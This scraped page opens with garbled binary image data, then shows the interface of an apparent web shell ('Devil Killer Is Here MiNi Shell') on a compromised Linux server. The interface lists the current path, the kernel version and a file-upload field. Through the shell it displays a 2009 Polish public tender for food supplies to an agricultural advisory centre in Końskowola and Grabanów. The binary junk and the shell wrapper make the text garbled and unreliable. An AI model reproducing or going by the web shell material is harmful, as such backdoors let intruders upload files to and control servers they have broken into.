JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/25596-N-2009.html

<p class="kh_header"><b>Końskowola: Sukcesywna dostawa arrtykułów spożywczych dla Lubelskiego Ośrodka DOradztwa Rolniczego w Końskowoli i Oddziału LODR w Grabanowie</b><br>
<b>Numer ogłoszenia: 25596 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubelski Ośrodek Doradztwa Rolniczego , ul. Pożowska 8, 24-130 Końskowola, woj. lubelskie, tel. 081 8816285, faks 081 8816663.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodr.konskowola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa arrtykułów spożywczych dla Lubelskiego Ośrodka DOradztwa Rolniczego w Końskowoli i Oddziału LODR w Grabanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Dostawa  mięsa, drobiu, przetworów mięsnych, wędlin dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola Zadanie 2 Dostawa ryb i przetworów rybnych dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola Zadanie 3  Dostawa nabiału dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola Zadanie 4 Dostawa owoców i warzyw dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola Zadanie 5 Dostawa pozostałych  różnych art. spożywczych dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola Zadanie 6 Dostawa pieczywa dla LODR Końskowoli ul. Pożowska 8, 24-130 Końskowola Zadanie 7 Dostawa mięsa, drobiu, przetworów mięsnych, wędlin dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska Zadanie 8 Dostawa ryb i przetworów rybnych dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska Zadanie 9 Dostawa nabiału dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska Zadanie 10 Dostawa owoców i warzyw dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska Zadanie 11 Dostawa pieczywa dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska Zadanie 12 Dostawa różnych art. spożywczych dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 Warunkiem udziału w postępowaniu jest spełnianie postanowień określonych w art. 22 ust. 1 Prawa zamówień publicznych. 2 Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona  w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.  3 Oferty wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków zostaną dopuszczone do badania i oceny. 4  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających spełnianie wymaganych warunków zostaną wykluczeni z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Oświadczenia:1.1 Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. (według załącznika nr 2); 2 W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, należy złożyć następujące dokumenty: 2.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2.2 Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczeni Społecznego, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 3 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: 3.1 Dokument wymagany w pkt VI.2.1 winien złożyć każdy wykonawca. 3.2 Oświadczenie wymagane w pkt VI.1.1 oraz dokument wymagany w pkt. VI.2.2 winny być złożone wspólnie przez wykonawców. 4 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w VI.2.1 - składa dokument, wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 4.1 nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 4.2 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt VI.4.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy dotyczące terminów wystawienia stosuje się odpowiednio. 5 Wszystkie powyższe dokumenty winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci za zgodność z oryginałem.  6 Dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski, poświadczonym, przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wodr.konskowola.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubelski Ośrodek Doradztwa Rolniczego w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 11:00, miejsce: Lubelski Ośrodek Doradztwa Rolniczego w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  mięsa, drobiu, przetworów mięsnych, wędlin dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab bez kości	50 kg Schab z kością 50 kg Karczek bez kości 80 kg Szynka wp. bez kości 150 kg Boczek bez kości 30kg Mięso gulaszowe	200 kg Mięso mielone wp. 300 kg Wątróbka wieprzowa 20 kg Wołowina bez kości 150 kg Wołowina z kością 50 kg Kurczaki 350 kg Porcje rosołowe 400 kg Piersi z kurczaka 150 kg Filet z indyka 50 kg Uda z kurczaka 1000 Szt. Mięso mielone drobiowe 300 kg Żołądki drobiowe 30 kg Wątróbka drobiowa 60 kg Flaki wołowe 150 kg Skrzydła z indyka 50 kg Słonina 30 kg Podgardle 20 kg Szynka gotowana wp. 30kg Baleron 20 kg Paróweczki wp. 30 kg Kabanosy 20 kg Kiełbasa szynkowa 25 kg Kiełbasa krakowska sucha 15 kg Kiełbasa zwyczajna 350 kg Kiełbasa swojska 300 kg Szynka drobiowa 20 kg Mielonka wp. 20 kg Kaszanka 150 kg Pasztet 30 kg Pasztetowa 25 kg Kiełbasa biała parzona 20 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa ryb i przetworów rybnych dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z dorsza 100 kg Filet z maruny 70 kg Panga 50 kg Śledzie matjasy 50 kg Śledzie po wiejsku 30 kg Rolmopsy 20 kg	Kostka rybna panierowana 60 kg Makrela wędzona 20 kg Tuńczyk w sosie własnym (puszka) 30szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa nabiału dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ser biały półtłusty 80 Kg Ser biały tłusty	50 Kg Ser żółty Gouda	30 Kg Ser żółty Salami	20 Kg Serki Hochland Mixtett (200g) 200 Szt Śmietana Gosposia 22% (1 litr ) 150 Szt Śmietana 18% (400ml) 30 Szt Jogurt naturalny (400ml) 40 Szt Jogurt owocowy Jogobella (400ml) 80 Szt Kefir (450ml) 200 Szt Mleko 2%  (1 litr) 100szt Serek homogenizowany Bakuś (100g) 150 Szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa owoców i warzyw dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraczki ćwikłowe 150 kg	 Brokuły	50 kg Cebula 250 kg Czosnek 40 szt Cukinia 	60 kg Fasolka szparagowa 50 kg Kapusta biała 300 kg Kapusta brukselka 50 kg Kapusta pekińska 250 kg	Kapusta włoska	200 kg Kapusta kiszona	300 kg Kalarepka 30 szt	 Koperek (pęczek) 60 szt Marchew 400 kg Natka (pęczek)	80 szt. Ogórek świeży 200 kg Ogórek kiszony	80 kg Pieczarki 80 kg Pietruszka 150 kg Papryka	60 kg Por 100 kg Pomidory 200 kg	 Rzodkiewka (pęczek) 150 szt Sałata lodowa 30 szt Sałata 50 szt Seler 350 kg Szczypior (pęczek) 100 szt Kalafior	70 kg Botwinka (pęczek) 100 szt Ziemniaki 3000 kg Banany	30 kg Brzoskwinie 50kg Cytryny	20 kg Czereśnie 20 kg Jabłka 200 kg Mandarynki 50 kg Kiwi 10 kg Pomarańcze 20 kg Truskawki 50 kg Śliwki 50 kg Winogron biały 10 kg Winogron czerwony 5 kg Wiśnie 50 kg Morele 40 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa pozostałych  różnych art. spożywczych dla LODR w Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrzan (400g) szt 35 Musztarda Parczew  sarepska szt	50 Ketchup Pudliszki (300g)	szt 50 Kukurydza konserwowa Bonduelle (400g)	szt 100 Groszek konserwowy Bonduelle (400g) szt 150 Fasola czerwona Bonduelle (400g) szt 60 Papryka konserwowa (0,9l) szt 80 Pieczarki konserwowe (0,9l) szt 40 Ogórki konserwowe (0,9l) szt 100 Majonez Winiary dekoracyjny (400g) szt 80 Kompot z czarnej porzeczki (0,9l)	szt 200 Kompot wiśniowy (0,9l) szt 100 Kompot truskawkowy (0,9l) szt 100 Brzoskwinie w syropie (850g) szt	40 Ananas plastry puszka (580g) szt	40 Seler konserwowy (słoik 320g) szt 60 Koncentrat pomidorowy Pudliszki (200g) szt 300 Ocet (1 litr) szt	15 Sól kg 150 Pieprz naturalny (20g) szt 50 Pieprz ziołowy (20g) szt 25 Przyprawa szefa kuchni (2kg) szt 4 Przyprawa w płynie (1 litr) szt 30 Majeranek (8g) szt 30 Liście laurowe (10g) szt 20 Ziele angielskie (12g) szt	15 Papryka słodka (20g) szt	10 Papryka ostra (20g) szt 10 Czosnek granulowany (20g) szt 30 Bazylia (10g) szt 10 Sos sałatkowy ogrodowy (9g) szt	50 Sos sałatkowy koperkowy (9g) szt 50 Sos słodko-kwaśny (słoik 500g) szt 15 Sos pieczeniowy jasny (30g) szt 10 Sos pieczeniowy ciemny (30g) szt 10 Delikat do drobiu (0,6kg)	szt 20 Delikat do mięs (0,6kg) szt 20 Delikat do ryb (0,6kg) szt 15 Zioła prowansalskie (10g) szt 20 Kostki rosołowe rosół z kury 12 szt w opakowaniu szt 100 Zupa gulaszowa Knorr (61g) szt 20 Zupa cebulowa Knorr (61g) szt 30 Zupa pieczarkowa Knorr (61g) szt 40 Żurek Winiary (45g) szt 50 Barszcz czerwony koncentrat (słoik 160g)	szt 30 Śmietanka do kawy (10gx10 szt w opak)	szt 300 Proszek do pieczenia (30g) szt 50 Cukier waniliowy (16g) szt 80 Galaretka owocowa Winiary (90g)	szt 50 Budyń Winiary (70g) szt 100 Dżem owocowy (280g) szt 60 Mąka pszenna kg 250 Mąka ziemniaczana kg 40 Płatki kukurydziane kg 40 Bułka tarta kg 50 Kasza jęczmienna średnia kg 40 Kasza jęczmienna drobna	kg 50 Kasza gryczana	kg 30 Fasola perłowa kg 30 Fasola Jaś kg 50 Groch łuskany kg 30 Ryż kg 50 Makaron domowy Pol-Mak (400g)	szt 50 Makaron łazanki Lubella szt 30 Makaron świderki Lubella 	szt 40 Makaron spaghetti Lubella szt 30 Kakao (250g) szt 20 Cukier kryształ kg 100 Cukier puder kg 20 Miód naturalny kg 10 Herbata Lepton ekspresowa (100 torebek) szt 20 Kawa mielona (250g) szt 50 Kawa rozpuszczalna (100g) szt 30 Kawa rozpuszczalna (200g) szt 50 Rodzynki (100g)	szt 20 Orzechy włoskie (100g) szt 20 Migdały (100g) szt 20 Paluszki solone Lubella (80g) szt 200 Paluszki z sezamem Lubella (80g)	szt 200 Ciastka kruche (1 kg) kg 50 Ciastka z czekoladą (1kg) kg 30 Wafelki (1kg) kg 40 Cukierki czekoladowe kg	40 Olej Mosso (0,9l) szt 100 Smalec	kg 40 Frytura opak. po 5 l szt 5 Masło extra (200g) szt 200 Margaryna Kasia (250g) szt 40 Masło roślinne szt 40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa pieczywa dla LODR Końskowoli ul. Pożowska 8, 24-130 Końskowola.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb krojony (0,5kg) szt 300 Chleb słonecznikowy (0,5kg) szt 150 Bułka wyborowa szt 500 Bułka wrocławska szt 60 Pączek szt 300 Drożdżówka szt 300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mięsa, drobiu, przetworów mięsnych, wędlin dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab bez kości	kg 610 Boczek surowy kg 160 Mięso wp. drobne kg 320 Szynka gotowana kg 72 Kurczak	kg 590 Pierś z kurczaka	kg 430 Wołowina z kością kg 30 Udziec wołowy kg 310 Skrzydła z kurczaka kg 250 Udka z kurczaka	kg 460 Kiełbasa biała parzona kg 150 Polędwica kg 90 Słonina	kg 20 Flaki krojone kg 180 Boczek wędzony	kg 110 Salami kg 50 Karkówka wp. kg 290 Ozory wieprzowe kg 50 Ozory wołowe kg 40 Filet z indyka kg 60 Parówki	kg 25 Kabanosy kg 20 Kiełbasa szynkowa kg 15 Pasztet drobiowy kg 20 Kiełbasa zwyczajna kg 80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa ryb i przetworów rybnych dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z ryby czerniak kg 280 Łosoś surowy kg 25 Łosoś wędzony kg 35 Filet śledziowy kg 180 Tuńczyk w sosie własnym (puszka) szt 110.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa nabiału dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ser Hochland śmietankowy (100g) szt 400 Śmietana 18% (400ml) szt 480 Mleko 2% (1 litr) szt 30 Jogurt owocowy (400ml) szt 100 Ser żółty Salami	kg 140 Ser biały półtłusty kg 50 Lody różne smaki (kuweta 5000ml) szt 220.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa owoców i warzyw dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sałata ozdobna szt 300 Sałata masłowa szt 400 Koperek (pęczek) szt 200 Rzodkiewka (pęczek) szt 200 Kapusta kiszona	kg 190 Pieczarki kg 380 Kapusta pekińska kg 150 Buraki czerwone	kg 350 Marchew kg 700 Por kg 120 Ogórek zielony kg 250 Seler kg 60 Pomidor kg 180 Papryka czerwona kg 140 Cebula kg 300 Cebula czerwona kg 50 Pietruszka korzeń kg 80 Natka pietruszki (pęczek) szt 170 Kapusta biała kg 150 Kapusta czerwona kg 30 Fasolka szparagowa kg 40 Szczypior (pęczek) szt 80 Fasola kg 20 Czosnek	kg 15 Ziemniaki kg 2000 Jabłka kg 280 Cytryna	kg 120 Mandarynki kg 5 Pomarańcze kg 15 Winogron biały kg 10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa pieczywa dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb weselny szt 30 Chleb wiejski 0,5kg szt 250 Chleb zwykły 0,6kg szt 400 Chleb razowy 0,5kg szt 300 Bułka słodka szt	200 Bułka wrocławska szt 150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa różnych art. spożywczych dla oddziału LODR w Grabanowie, Grabanów 21-500 Biała Podlaska.</p>
